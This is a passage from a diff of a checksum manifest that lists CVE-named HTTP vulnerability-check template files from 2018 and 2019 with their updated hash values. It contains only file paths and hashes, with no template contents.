-http/cves/2018/CVE-2018-18809.yaml:5824b2854325d7b2c3099f802316cbf6bbebfaee -http/cves/2018/CVE-2018-18925.yaml:0999c707d20e7674e3316fcb080494b4aa7c2a74 +http/cves/2018/CVE-2018-18778.yaml:345345f22b91b7718f170610f99da622f2ac9d34 +http/cves/2018/CVE-2018-18809.yaml:1f7763fa493ca0d15696e5b3295e709d8ba7225d +http/cves/2018/CVE-2018-18925.yaml:b1fd3177d88d9ffb062160bf5bf78f8448970b11 http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e http/cves/2018/CVE-2018-19137.yaml:10f56626df0c7fa74817bc38fef21ab7da2bb199 -http/cves/2018/CVE-2018-19287.yaml:740bc06472e431b5cc9bfccf489ab004996c0f3d -http/cves/2018/CVE-2018-19326.yaml:62359b3ae095f6a9b084fa027a12efcc9eba6f69 -http/cves/2018/CVE-2018-19365.yaml:576ff6d8085f14db8b3c1db51e1aa6346c5e4031 +http/cves/2018/CVE-2018-19287.yaml:33842e2c13500ace90d63f3e5ff94015026c7f2b +http/cves/2018/CVE-2018-19326.yaml:96578e44556f708d4e12da4314d88b194986ca78 +http/cves/2018/CVE-2018-19365.yaml:1b0bd4e795aa22cfffdaf69aa3db36e1b1de7735 http/cves/2018/CVE-2018-19386.yaml:521152286d482dead5c0d91b75d6246646629049 http/cves/2018/CVE-2018-19439.yaml:44f03cecf9c0742b6658b1c454bbd93724aa96c4 http/cves/2018/CVE-2018-19458.yaml:565726e6eeb6e8b7c405013cee2c313b909fa120 http/cves/2018/CVE-2018-19749.yaml:28104dd3a487cd17227ce25cc9338dff9c08cfde -http/cves/2018/CVE-2018-19751.yaml:41a013ed8f511aaea82081e075916ed638b1ebab +http/cves/2018/CVE-2018-19751.yaml:236b46333b4516ff33df4e91bc1d787a78f7d947 http/cves/2018/CVE-2018-19752.yaml:71e38315bba3bb99c68bb98ae47546e3a8852636 http/cves/2018/CVE-2018-19753.yaml:20eac71a3629c82df03f7b5d5221e06b8b89b8c2 -http/cves/2018/CVE-2018-19877.yaml:31aa058606935cc5babf7d592f92f87aeaf162ec +http/cves/2018/CVE-2018-19877.yaml:bf900a8a82f85573f3e4c9e8c3d007e286e5508e http/cves/2018/CVE-2018-19892.yaml:b0823b9b53093ad710fc09dbdb2e78790f92a200 http/cves/2018/CVE-2018-19914.yaml:a114f893cf8568e67d37bc14ffe7873fa217c612 http/cves/2018/CVE-2018-19915.yaml:1611fce07118e7ebc351f355cfdb0433425c89b1 http/cves/2018/CVE-2018-20009.yaml:ee1015fa79e95b36c728126336f745c57b8234cd -http/cves/2018/CVE-2018-20010.yaml:ec78911a377dfae9ce54f561a7d71ba449a741dd +http/cves/2018/CVE-2018-20010.yaml:9959fb357088a02f52f318e63de6346a72fc570f http/cves/2018/CVE-2018-20011.yaml:98950dff4dbf42b3759537438082d4166c789270 -http/cves/2018/CVE-2018-20462.yaml:70faa7b267536593d4b33427ff677d12deb57cce +http/cves/2018/CVE-2018-20462.yaml:3bfc695969e7bc9a10279967cb80f7e5ff3d91cb http/cves/2018/CVE-2018-20463.yaml:9712578b99f890b278c05e83cce8bf9ab31cf93f http/cves/2018/CVE-2018-20470.yaml:ea3915d1ed278c8a4cbd4f954db50271ba8356f3 -http/cves/2018/CVE-2018-20526.yaml:fbbc6402437df32074a1b2b054e1c0ab9b127a29 +http/cves/2018/CVE-2018-20526.yaml:e0821c15d241d3386b9f39f70e686206e141407b http/cves/2018/CVE-2018-20608.yaml:92c17d1974d5042e036f5bfebf8cb2b0fe669c34 -http/cves/2018/CVE-2018-20824.yaml:6ea5cdd90c960d5ecc05e736199e1a6954baca18 +http/cves/2018/CVE-2018-20824.yaml:d105e7bc49183cbe5c9f1c10ef9712f86b8178ca http/cves/2018/CVE-2018-20985.yaml:4bb634eec7d3375bcddca14b53c76512eba48045 http/cves/2018/CVE-2018-2392.yaml:b0dfd0dc15a700e7739aaea55f5d5aa6fb45b61c http/cves/2018/CVE-2018-2791.yaml:31136b756dcfeb64b3f98823a29b78db51519f5b -http/cves/2018/CVE-2018-2894.yaml:118a0c7de50f4a856992bfa9380c946b2f4dd28f +http/cves/2018/CVE-2018-2894.yaml:9aa7f6bacd7da0d44a9ede18e8fe426d8ea7fb9a http/cves/2018/CVE-2018-3167.yaml:248b1742e31ca65c14d9ae9a070849d9850b077f http/cves/2018/CVE-2018-3238.yaml:290f44dd8265304d0a28fe5a8814b51d8a7a3a56 http/cves/2018/CVE-2018-3714.yaml:467fa520a83d33a07e51718f5bcb3c358beea1d4 http/cves/2018/CVE-2018-3760.yaml:90f7093f1e64c13dea1afaee2fe85b1fcef938ff http/cves/2018/CVE-2018-3810.yaml:2d56de0a9b2c76b6aad57d50302dbcf26a90e6b2 -http/cves/2018/CVE-2018-5230.yaml:9c084e311280bf0b0b4e0ea9b249b7a0b20c67de -http/cves/2018/CVE-2018-5233.yaml:437e02a1ebdd20198ef1456d32007910ae09cf2f +http/cves/2018/CVE-2018-5230.yaml:c57978d17df273f0897969aaad1f4985e575b730 +http/cves/2018/CVE-2018-5233.yaml:e800c69052a11c137e03ac87e57691ace036ce4a http/cves/2018/CVE-2018-5316.yaml:fe0e4112fa6a7f2918925dff5501b19680026501 -http/cves/2018/CVE-2018-5715.yaml:d7a49108189cfcd6c75a6cac00344fe146dff4d8 +http/cves/2018/CVE-2018-5715.yaml:ac6f6ac7ac3de100cb069081bc64a1e33ede4ec6 http/cves/2018/CVE-2018-6008.yaml:d9b979c4b3813f317c2efe8206d4e8a5b1215e3e -http/cves/2018/CVE-2018-6184.yaml:1ea895f0a16a76f223dd4812f77b50d84bec0703 -http/cves/2018/CVE-2018-6200.yaml:7588192682a4ac8c00d7c6a83621103dd23e0c8d -http/cves/2018/CVE-2018-6530.yaml:a7ec85a12911cc378322baaa7a1912ca731ce631 -http/cves/2018/CVE-2018-6605.yaml:9395411144d77cf69a9f241d6eac574be3803a3a -http/cves/2018/CVE-2018-6910.yaml:c84b3d5ba116c18bc9f605d5f208a7392d2bc5b4 +http/cves/2018/CVE-2018-6184.yaml:29400990ed3b50192d9839bcc4080bdf1b066868 +http/cves/2018/CVE-2018-6200.yaml:88a53dfc13b0fd0254dcb6bf9dc619e09c91b495 +http/cves/2018/CVE-2018-6530.yaml:db4546ccfe19beaf259c40d828e0ae8949f094a3 +http/cves/2018/CVE-2018-6605.yaml:dfe8c1b4bfe464a251889ec34a6cb0c0aacf312d +http/cves/2018/CVE-2018-6910.yaml:9092a097d0bdb732c53003552513ce216fe13369 http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 -http/cves/2018/CVE-2018-7282.yaml:5f91f643f99ad1bcc155f74d02c0cf692383611a -http/cves/2018/CVE-2018-7314.yaml:bd70e733cbf74d122f249c148b42dab8ddacb60f -http/cves/2018/CVE-2018-7422.yaml:e3c039258631c4bcd6be9a250683a659c30589e4 +http/cves/2018/CVE-2018-7282.yaml:685d96189b0ef30acb41d198afeacc915ba2f1ef +http/cves/2018/CVE-2018-7314.yaml:5f52f2777c68b2c1b66e88a2bd6aa228adce2fad +http/cves/2018/CVE-2018-7422.yaml:a130447be6cf9891b897796ad7e93263681d111c http/cves/2018/CVE-2018-7467.yaml:1b0142f9c76787034d813d1cb3bf1d803ab77c63 http/cves/2018/CVE-2018-7490.yaml:569286ff6beffe744aed0915b8d887e6921ee84b -http/cves/2018/CVE-2018-7600.yaml:c000552581e79c98057d74f9da4a469bcf5ec93f -http/cves/2018/CVE-2018-7602.yaml:d463f1fde61db5200400511b3ffdb63f0d8c0d64 -http/cves/2018/CVE-2018-7653.yaml:b96ae7482cb6da1010b5f9262dbea86982fdc147 +http/cves/2018/CVE-2018-7600.yaml:a508c10b70d82b0f3d829a14bda447d2575cf419 +http/cves/2018/CVE-2018-7602.yaml:641384235e3b1e674c1d1c90a3010684bf32f261 +http/cves/2018/CVE-2018-7653.yaml:bded3e99b23fcc45db52479f46a331c30e0e0e09 http/cves/2018/CVE-2018-7662.yaml:f227ce3aa502c6302dbe55932d703c645119b1c6 -http/cves/2018/CVE-2018-7700.yaml:51f8418b0b9929da6e5a02acd58ea51d47a61bf0 +http/cves/2018/CVE-2018-7700.yaml:a6fbf04288ae18b2a24d9ed42e401444a650d13c http/cves/2018/CVE-2018-7719.yaml:47cab26137d85e8909949d13e765303fb157f35e -http/cves/2018/CVE-2018-8006.yaml:3b6d44bf0fe24307cfd762aa476b70b45ab9ce11 -http/cves/2018/CVE-2018-8033.yaml:1413436dc458d3d24ef1b6ef0516fb29b82bd0e4 +http/cves/2018/CVE-2018-8006.yaml:4a6ac001f0876c85d01f2b4426ae7993622f7379 +http/cves/2018/CVE-2018-8033.yaml:069361da62a9fee5d3c1f3ecde881aecea7192a6 http/cves/2018/CVE-2018-8715.yaml:d4851d7cc81088c538c4f3b2a73af93400e44e0e http/cves/2018/CVE-2018-8719.yaml:78364732d8025f076c2a124f70afd3e5bd934968 -http/cves/2018/CVE-2018-8727.yaml:fc1c33f0a40fc19bbd5c77e8bc0a71e35d54e56d -http/cves/2018/CVE-2018-8770.yaml:697c1ba6a15230f9f9f2ce2899ebefc4fc0ef068 -http/cves/2018/CVE-2018-8823.yaml:acf4fbf0c8efd75fa11f47e4bce90db39d83af47 +http/cves/2018/CVE-2018-8727.yaml:27f534aaa7fb7c777126f34c95909bb61e6621e9 +http/cves/2018/CVE-2018-8770.yaml:ec6ad882d9d54f409802bbeab09118fe4766d808 +http/cves/2018/CVE-2018-8823.yaml:754907883c75212da4903f7176b090bf307f3bca http/cves/2018/CVE-2018-9118.yaml:4c13276c78e4d2e73f19a54a77115b4c4a48aae6 http/cves/2018/CVE-2018-9161.yaml:f98357d745d30e54b9a0f949e05f38ae29148319 http/cves/2018/CVE-2018-9205.yaml:1499d18423846d499f720c4264a44ad75f27f93f -http/cves/2018/CVE-2018-9845.yaml:1d90b0a63da858688c950787f350bc620243c869 +http/cves/2018/CVE-2018-9845.yaml:544155d4176620f3a59236ff1c27d402be5f8a87 http/cves/2018/CVE-2018-9995.yaml:1acb8eb87312ef544059faa23df771316f81e41d -http/cves/2019/CVE-2019-0193.yaml:5895cee3d3ed5862b9cd6e0d90007292231a467f -http/cves/2019/CVE-2019-0221.yaml:a60272d48feb8c14024507bad12a828ddb1bdf8e -http/cves/2019/CVE-2019-0230.yaml:5bea44b0e336d65b242265604818831f218831b5 +http/cves/2019/CVE-2019-0193.yaml:31cf560767e5d39ef11b5b2c8e528f7e3b339669 +http/cves/2019/CVE-2019-0221.yaml:c096b3812463e72b66e91915c8a7303c2c5aa0da +http/cves/2019/CVE-2019-0230.yaml:71b387fc91dcacf38555fdfd7a2f384f11f82ba1 http/cves/2019/CVE-2019-10068.yaml:490f5b18e6a9df7eea47ff5973a4ef6917eb3e84 -http/cves/2019/CVE-2019-10092.yaml:95036721a0c5900e3a43158830752db468be81ab -http/cves/2019/CVE-2019-10098.yaml:87e95f3b56cfc09f00ff2b41cd42e53aea290fe8 -http/cves/2019/CVE-2019-1010287.yaml:cec033f9ac31aaf83bd80c9279ab5a7aed4b890a +http/cves/2019/CVE-2019-10092.yaml:1b7c312d6b6d3fc2fd03c9c5053f62837215fb54 +http/cves/2019/CVE-2019-10098.yaml:f135aed03cc212d711adf1dc9f69dc15150f7117 +http/cves/2019/CVE-2019-1010287.yaml:4c4caaa3595c2c767665b33a94660216908b650a http/cves/2019/CVE-2019-1010290.yaml:a264cb928c69ab6428e128c0ee33d265634e2fc2 http/cves/2019/CVE-2019-10232.yaml:713f169c89ece5300e52e0bc987370371d9b3573 -http/cves/2019/CVE-2019-10405.yaml:48da2adabbe91b7c6fc6e17540d8905a684e0432 +http/cves/2019/CVE-2019-10405.yaml:8a82ad3b8b1087a5dd21a84315fc0d678ab33b65 http/cves/2019/CVE-2019-10475.yaml:95b5f0bc9f584b4e7c2c7b39fa2de8560c35c198 http/cves/2019/CVE-2019-10692.yaml:e03cfcc646b10b50f803898d7416ba908c049add -http/cves/2019/CVE-2019-10717.yaml:9c839238a9f9cca85816c8eaa99416c353849633 -http/cves/2019/CVE-2019-10758.yaml:5e68af684ce511d788c47f865c3b01ed1abc280c +http/cves/2019/CVE-2019-10717.yaml:10f9e51439d926c6194e1d212ddafba6721e5db0 +http/cves/2019/CVE-2019-10758.yaml:901ad37c15d72a42932b0a257e43cd0027716509 http/cves/2019/CVE-2019-11013.yaml:2ad66e116c4d085161542c51376f4c68df78c478 -http/cves/2019/CVE-2019-11248.yaml:69bf371a2ae74df3a820ec654e531183cd52d586 -http/cves/2019/CVE-2019-11370.yaml:7bb4da17ad5c55a29cab53cae1ff9e90da64e689 -http/cves/2019/CVE-2019-11510.yaml:d6e6d6ad78a3445f60bb6e8dc75b37f289293c7c -http/cves/2019/CVE-2019-11580.yaml:a8e99a85051c0f58b7c7ddb91fd590639e1f0b62 -http/cves/2019/CVE-2019-11581.yaml:0962a26453640de4363d4e0ca655b9ee0d8598fc +http/cves/2019/CVE-2019-11248.yaml:94f9aa12f2df09ed521b163f16a4c46e3401e111 +http/cves/2019/CVE-2019-11370.yaml:553150d31098410ba431c834b075b4a0788c9264 +http/cves/2019/CVE-2019-11510.yaml:0391926a4fd2eaaedcb51b8dcad38fc2dd0dbb32 +http/cves/2019/CVE-2019-11580.yaml:028fc2d8186c261233f34d98c282009b49a2232f +http/cves/2019/CVE-2019-11581.yaml:7f55d6b6e29961c4aee0ce27d2c303b3de70a20a http/cves/2019/CVE-2019-11869.yaml:223e8fbfc472a62769340c41f0017a013b42fc6d http/cves/2019/CVE-2019-12276.yaml:fb5177e00a08d1ba5ec2ed962b12056e8d3a5fe9 http/cves/2019/CVE-2019-12314.yaml:45e5093a3ac421643dcc25859931c3b6ba9057f6 http/cves/2019/CVE-2019-12461.yaml:e59515dfc19f812aafa8c4b0bdad9c28b65ff574 -http/cves/2019/CVE-2019-12581.yaml:12e619fd37b7542432f3e428fb46b1a23b80f81f +http/cves/2019/CVE-2019-12581.yaml:960179d39016c873230ad7dc7337319a3b7b68ae http/cves/2019/CVE-2019-12583.yaml:839bb71239abe5bf41aad959223aad3708482b5b -http/cves/2019/CVE-2019-12593.yaml:dc9651e2d0787a3835e6295e77f9712c5db91236 -http/cves/2019/CVE-2019-12616.yaml:5695c1a6d55803b3e91baa1665080f813a00f390 +http/cves/2019/CVE-2019-12593.yaml:e59a8d310e2ecb640e39bbfd1d191618c048fd7a +http/cves/2019/CVE-2019-12616.yaml:33806adb06c11a04fd5ed55524da3177d910c92c http/cves/2019/CVE-2019-12725.yaml:eb150ec0f37948a8e69b924d384e5f3f5d8a53a8 -http/cves/2019/CVE-2019-12962.yaml:5328204943985ad35ed0950cb5ccf286f1fa4c19 -http/cves/2019/CVE-2019-12985.yaml:48d3aa004dc4ae95cef74e06075943140c4a9ebc -http/cves/2019/CVE-2019-12986.yaml:00a8b35ba0b68e57a067fd139f7e7f52e8f843f9 -http/cves/2019/CVE-2019-12987.yaml:da3ea360d3019964911b678511236af53c41f6a7 -http/cves/2019/CVE-2019-12988.yaml:dd6ba95dbd27857f3fe47ca526dbff0f0e58e938 -http/cves/2019/CVE-2019-12990.yaml:d0773ec188e357d710146736e3af8a86e9319348 +http/cves/2019/CVE-2019-12962.yaml:bf87575fe193dea9289b2f07d453849508d42425 +http/cves/2019/CVE-2019-12985.yaml:f22fea2173efc533fa7656d744bf27a6ec8f68c2 +http/cves/2019/CVE-2019-12986.yaml:bcec4f64aa9287466574468fb7c8616cc19c9c80 +http/cves/2019/CVE-2019-12987.yaml:956df154fa7345e031700b449a1373d638b3cb7d +http/cves/2019/CVE-2019-12988.yaml:2054b6d39fe520abb83cb06b4c2ff5de5d8c4421 +http/cves/2019/CVE-2019-12990.yaml:68d9b094f8ef30ffe40f7b47c0650149b752ad81 http/cves/2019/CVE-2019-13101.yaml:ae9d95abb521c1b79cce351d330dc3b42e84070b http/cves/2019/CVE-2019-13392.yaml:ce2b84675b816ead08f4912d7f894cf7cc7ac516 http/cves/2019/CVE-2019-13396.yaml:cd8a877aba811f643970cfea627a30bc48b29bec @@ -1583,197 +1583,197 @@ http/cves/2019/CVE-2019-14205.yaml:d57f3dd988d8000bb5d2a513d4f51cda75496cd2 http/cves/2019/CVE-2019-14223.yaml:3be945555ecd14072d1bf7d87ef59f0e29c73ddd http/cves/2019/CVE-2019-14251.yaml:2cd3f4fb3bb8ec7706366410a493577aa6ecddf0 http/cves/2019/CVE-2019-14312.yaml:65fa579c20b881c49bd5fbadb68612d6aeea7765 -http/cves/2019/CVE-2019-14322.yaml:d243539818020519b68411124848fbd58922df93 -http/cves/2019/CVE-2019-14470.yaml:feb43273bc10cccf96b8e1fdfa8c3973442039ad -http/cves/2019/CVE-2019-14530.yaml:014ef9f12577fee10e36847921273da870dd6ef0 +http/cves/2019/CVE-2019-14322.yaml:9058f60a731d772d1bb4a72506907f3578c0dfd3 +http/cves/2019/CVE-2019-14470.yaml:19ff7668d85695c13252e32bb237696506feebf9 +http/cves/2019/CVE-2019-14530.yaml:e3135f6a3470736b273a9368031e0bf0d585d695 http/cves/2019/CVE-2019-14696.yaml:8bb0920522198a471f418d5106d40090b74d447f -http/cves/2019/CVE-2019-14750.yaml:737327d2f4497b21934509672c8a1c94a275a460 +http/cves/2019/CVE-2019-14750.yaml:1b2ff499c06097cb3f482dcb443ecbd427178023 http/cves/2019/CVE-2019-14789.yaml:9abfb241c4372064325299d720740ad9ff35c0cb -http/cves/2019/CVE-2019-14974.yaml:5c660e5883ab8bc860a41cea3b9bcc1e77e15b63 -http/cves/2019/CVE-2019-15043.yaml:3567875d44a426e9b0524f0f3ff3fdcb519932d1 +http/cves/2019/CVE-2019-14974.yaml:e98792c8f9c711cae7391e17f06f5fb437f0dd33 +http/cves/2019/CVE-2019-15043.yaml:4deb4505cd70a1a8752ca8c8bdb061a1b87876b0 http/cves/2019/CVE-2019-15107.yaml:cc948e3dce86ff30d549a30c11561d60446b9ee5 -http/cves/2019/CVE-2019-15501.yaml:ddc8d6187b18cc11941668ab296fc15a79c0dde6 -http/cves/2019/CVE-2019-15642.yaml:59ceb63e7c806e8540159a3f39c44aaa92a154af -http/cves/2019/CVE-2019-15713.yaml:10e07c10f196b1400a503b97ad125903ed1adbb8 +http/cves/2019/CVE-2019-15501.yaml:e7f26db3c4dee04092c22e76a71ca5d0c7267cc5 +http/cves/2019/CVE-2019-15642.yaml:361482b6de9480a30f106adca9d74bfb34708fc9 +http/cves/2019/CVE-2019-15713.yaml:c530f6f210728ab2c41407c4185e8c82accf97ed http/cves/2019/CVE-2019-15811.yaml:f14050a032d55ce2ae1959a23cb97fe4cc75e464 -http/cves/2019/CVE-2019-15829.yaml:d93dae607fbbfda1f268030ff115744eda65f509 +http/cves/2019/CVE-2019-15829.yaml:4b9ff0bb1461db5f85312405b47a267021c4f1e2 http/cves/2019/CVE-2019-15858.yaml:dd0e88830d6f0a234634472d109bda9140c02c6a -http/cves/2019/CVE-2019-15859.yaml:45fdb86453346868de8338e41b0f108ee04042fc -http/cves/2019/CVE-2019-15889.yaml:3ef52eea70d7104a5109ff788384c3621e76a0a9 -http/cves/2019/CVE-2019-16057.yaml:a150d97bc24b0a958ee98070fde580a880be1c13 +http/cves/2019/CVE-2019-15859.yaml:3ea85cf262735e5dbb427a42d639d1a407420d38 +http/cves/2019/CVE-2019-15889.yaml:df3eba3207440c9890d767c05152c1ec1bf24ae9 +http/cves/2019/CVE-2019-16057.yaml:2eb03e2bf61a3c36ffb6589d971902e253a39a70 http/cves/2019/CVE-2019-16097.yaml:be89395f00bc61330f2b6483c9295c1d39768fb5 http/cves/2019/CVE-2019-16123.yaml:9b28bd8cc89e8a3286374b34dd60bfcce4fe27d0 http/cves/2019/CVE-2019-16278.yaml:d4149d9e0cf739bdaac6caec400e0b9fe8be159c http/cves/2019/CVE-2019-16313.yaml:2379d3c097b5e6a2915c5b8874f8700eff6656f2 -http/cves/2019/CVE-2019-16332.yaml:6fc333ecc72bb9ae7f7cf1a81bf0e63501faee48 -http/cves/2019/CVE-2019-16469.yaml:e350011c828be2e66f871dd7b339fe9bcd151ff3 -http/cves/2019/CVE-2019-16525.yaml:51db7d84c840ddecfabe91c8b79dffc9e85b0700 +http/cves/2019/CVE-2019-16332.yaml:48a30c9351ec4a9b949690f56d1c5f716317edfd +http/cves/2019/CVE-2019-16469.yaml:850f8e8a77012476e4698c519df222f2cd13dd22 +http/cves/2019/CVE-2019-16525.yaml:a6736e1fee1b9638aa95acb1ec8c377e9263d39f http/cves/2019/CVE-2019-1653.yaml:8fbf1f7164f46c7bf4fbc5a14bdf3c6bc17fc9ce http/cves/2019/CVE-2019-16662.yaml:9229e08486910b48989f08049c83d04a45daf59b -http/cves/2019/CVE-2019-16759.yaml:b14316e4ddccd5f1593266fc28ac98d8d41f6312 +http/cves/2019/CVE-2019-16759.yaml:abfaca39d9355ef9270704b245d94e03abd2d4fa http/cves/2019/CVE-2019-16920.yaml:865e89896464d2b4a5e61700021863096a8a2bd2 http/cves/2019/CVE-2019-16931.yaml:c4ce5984023bdfde781c4fa8b19a8b782f2c9e09 -http/cves/2019/CVE-2019-16932.yaml:752a6400d3e725e0709b45b312927f30d3d82162 +http/cves/2019/CVE-2019-16932.yaml:9c91bdae5079d0df293ae7225d5af62b9de5ae57 http/cves/2019/CVE-2019-16996.yaml:6af14042b97fa925502d1c0b180890cb8f30b9ac http/cves/2019/CVE-2019-16997.yaml:b7e350a4629c6352013831586ca26ecb0020851f http/cves/2019/CVE-2019-17270.yaml:d48604df6ef77def3e7fa1c9f6f916233f0cf6e3 -http/cves/2019/CVE-2019-17382.yaml:3c990cd6c5d0427e09eac074017e4a235b0fe06f +http/cves/2019/CVE-2019-17382.yaml:d60ed21681f722c8f54de41cc380d1e26909567a http/cves/2019/CVE-2019-17418.yaml:09d65f801c6153058cda117d92049c4ae9580a07 http/cves/2019/CVE-2019-17444.yaml:fe7925cc25fd290827df56c3772006ff4f4daa72 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 http/cves/2019/CVE-2019-17506.yaml:b0db1a0dd94538fede1011a56f7f41708dc89d6d http/cves/2019/CVE-2019-17538.yaml:e427655cb8a73e608adee628c3ca459b713921ee -http/cves/2019/CVE-2019-17558.yaml:9750af36fb5994404b46600389c124d00ebb9113 -http/cves/2019/CVE-2019-17574.yaml:4ba50fc7133a0618d27bceb9b14c83dcb34a38c4 +http/cves/2019/CVE-2019-17558.yaml:1d2870833ce822d2056ec6a07e9b8c928181983b +http/cves/2019/CVE-2019-17574.yaml:499a7706a78fae17b74407fa7bafa07cd5f9b5e8 http/cves/2019/CVE-2019-17662.yaml:8e6fedc5549df29f3f224e263ef72013c5672dbd http/cves/2019/CVE-2019-1821.yaml:4325f02bbf036da272e74d6c0bd97165d27bfe47 http/cves/2019/CVE-2019-18371.yaml:fec092d5d3baa9fdd72fa9d57474ff90a3bbfa37 -http/cves/2019/CVE-2019-18393.yaml:0a5fa73baf012eea8c099130c6e6bc6e8a9f4aec -http/cves/2019/CVE-2019-18394.yaml:ee24803bb21344bb3567f8acc905623730d90184 +http/cves/2019/CVE-2019-18393.yaml:275a79b64223d7e71595ab2f89da5aa775aad319 +http/cves/2019/CVE-2019-18394.yaml:a92c96c33dfcefdeebfc04b357450920588cb314 http/cves/2019/CVE-2019-18665.yaml:ddd5fc6661c5a4d13da8ecba440daf78f4dec7f0 http/cves/2019/CVE-2019-18818.yaml:c8f04d93a506f8d1d801ba19e51d1dc4f5005d43 -http/cves/2019/CVE-2019-18922.yaml:95118c0faac56d9ab7f7c0731d9ffd8d37413f74 +http/cves/2019/CVE-2019-18922.yaml:32c671c6ddfc6f344de73bef9fb95705a7ddc0a9 http/cves/2019/CVE-2019-18957.yaml:0fa1c55cdae830f3c0a64b01886c2ec2c4f769b9 -http/cves/2019/CVE-2019-1898.yaml:d6da27d5250a3f1699b7332444d4276e0f6eb3dd -http/cves/2019/CVE-2019-19134.yaml:3db2b49e04e2ee29182af1285b416361be36a428 +http/cves/2019/CVE-2019-1898.yaml:a52c9d3385418512bf7e3a62fb891871aae9875b +http/cves/2019/CVE-2019-19134.yaml:e067b4333933ad2cba0f118f599bbbcd25c207c8 http/cves/2019/CVE-2019-19368.yaml:c6ca0ce8b465ba621c9953b40ce5cf83f5e4d90a -http/cves/2019/CVE-2019-1943.yaml:866d0aa9df67c656e9ff6b133d795e5da483b26b +http/cves/2019/CVE-2019-1943.yaml:c90bd6205f20779491cbe48b3bcdae2297aaebcb http/cves/2019/CVE-2019-19781.yaml:8818dd71d9de019748689ab135368ea27178f8ae http/cves/2019/CVE-2019-19824.yaml:32d5ce9eb42b06926942b7aa6aa1dad1436e97ac http/cves/2019/CVE-2019-19908.yaml:9f9fc75caaf52382b3e1342991443b636e222ae0 http/cves/2019/CVE-2019-19985.yaml:8f1e3cb36997db32ba57b1270de3f5692db1264a http/cves/2019/CVE-2019-20085.yaml:7a89305d4926c92ba6536f6fff5a2f6eb2eecf77 http/cves/2019/CVE-2019-20141.yaml:a35d73a26d4304223e7f62e87791e663a12e069a -http/cves/2019/CVE-2019-20183.yaml:09eb91b7f52447d8655a37ed4bbe95300e7378bf +http/cves/2019/CVE-2019-20183.yaml:0475273b61996c7834c64266235f51589dfde923 http/cves/2019/CVE-2019-20210.yaml:423485155c1d5ad2f94ce866e2a2d9738d7eb701 http/cves/2019/CVE-2019-20224.yaml:d4627b2f43c8bd7e4417435f435f678196e8ea83 -http/cves/2019/CVE-2019-20933.yaml:2dcc2b52e8b1e6037cab9f8c91a66d03ddf27cb6 +http/cves/2019/CVE-2019-20933.yaml:9dc3328a7fa1bc1601b2e6f659fcf62964a3acc0 http/cves/2019/CVE-2019-2578.yaml:a0704f60e75947e62e565cb45595a84b731dd81b http/cves/2019/CVE-2019-2579.yaml:f7deec158d506da6c216c93f0375f5a927317da4 http/cves/2019/CVE-2019-2588.yaml:c7f798622689a44bf38e9c96710add9c5bdcc5cd http/cves/2019/CVE-2019-2616.yaml:49771e4c9de01bd8e36ce88a50a5d707dda27c66 http/cves/2019/CVE-2019-2725.yaml:c0b1c9de5b114881547faa1ecb3a9dfe55f3af0c http/cves/2019/CVE-2019-2729.yaml:222af28a1803c75b198281d8150ae8e6eeb863e9 -http/cves/2019/CVE-2019-2767.yaml:9c9628b7dead68845570d0883068ad29cec11c69 -http/cves/2019/CVE-2019-3396.yaml:24a87a48a55562a9f9284f20e9b59b12a0e52727 -http/cves/2019/CVE-2019-3398.yaml:0f781eea698b5305dc59e8e6c441a04510225a91 -http/cves/2019/CVE-2019-3401.yaml:e919f1305ffa5044b5eac5e37d80178d8413aadf -http/cves/2019/CVE-2019-3402.yaml:e875780f5316e2e685f55c79921cdcb90390396b -http/cves/2019/CVE-2019-3403.yaml:2e3792d689965282d2c111d88a73504d7dce6e2d +http/cves/2019/CVE-2019-2767.yaml:e7fdda3b37c5eb3f8140fe956f8cea10fb1d76f2 +http/cves/2019/CVE-2019-3396.yaml:85d418e9b2bee0dade0070adf1bfb9bb14cce3ea +http/cves/2019/CVE-2019-3398.yaml:5fdebac063f09dfac0e6cea08eb817841e243bcb +http/cves/2019/CVE-2019-3401.yaml:184fcf9901a21e0aa31c81511950f045fa44b4fa +http/cves/2019/CVE-2019-3402.yaml:704b1e62bac15cf36c484aea356cf95b5f41484e +http/cves/2019/CVE-2019-3403.yaml:7347c24e1d80a177ae555b9b31541558d1a515cd http/cves/2019/CVE-2019-3799.yaml:b50992af94bf8f2b667b253029d6e978c184686a -http/cves/2019/CVE-2019-3911.yaml:817157aaf7e4b3ecc9c7ad6203707d49e0d05544 -http/cves/2019/CVE-2019-3912.yaml:05816b1655912464da0072b87cdfe90eee7b0719 +http/cves/2019/CVE-2019-3911.yaml:6242246a29e0eb20cac54340c68e61c3d9d9e7ec +http/cves/2019/CVE-2019-3912.yaml:1dd70dedfce606d51d2760a06019f39ed08a995e http/cves/2019/CVE-2019-3929.yaml:9de8f3f7312bd0b5525ba41b71ddffeb6dc193bf http/cves/2019/CVE-2019-5127.yaml:a18cf67b04c44e210d6fc33343dd77820fc1555b -http/cves/2019/CVE-2019-5418.yaml:69a34f868bdea612ab7691eab3543566947699b9 -http/cves/2019/CVE-2019-5434.yaml:4c1da5f6a66c7c48bab3d57a5b7f0edc6a7ed024 +http/cves/2019/CVE-2019-5418.yaml:0f853f229ae869832fbe23a33a0cd4c8dd9295ce +http/cves/2019/CVE-2019-5434.yaml:48e0b91b298a4d62cbfca1e3d7a625bbca5b409e http/cves/2019/CVE-2019-6112.yaml:d009c3b8cc6cdb705307890c9ec89513170694d8 -http/cves/2019/CVE-2019-6340.yaml:86e83cd0f886a50667fb3cfc64d5537c48140ce9 +http/cves/2019/CVE-2019-6340.yaml:079d32432763fc4f16999d32225034ea113792d8 http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e -http/cves/2019/CVE-2019-6799.yaml:f6e232fc8162233e387fd6b8feb6343a3d4a4bc1 -http/cves/2019/CVE-2019-6802.yaml:8e97b2928034c605cf63ea06495bd7323b1b4b4b -http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7 -http/cves/2019/CVE-2019-7192.yaml:4b711f4f722e162132785380aa6ec24148834ec6 +http/cves/2019/CVE-2019-6799.yaml:c797d51c9e31f131e6195de09c5eff0f337c9d12 +http/cves/2019/CVE-2019-6802.yaml:766bcc20164c341f38cef37e10e7190286349368 +http/cves/2019/CVE-2019-7139.yaml:2694244ec9f34c68a877186b2c3eb9edcf48e764 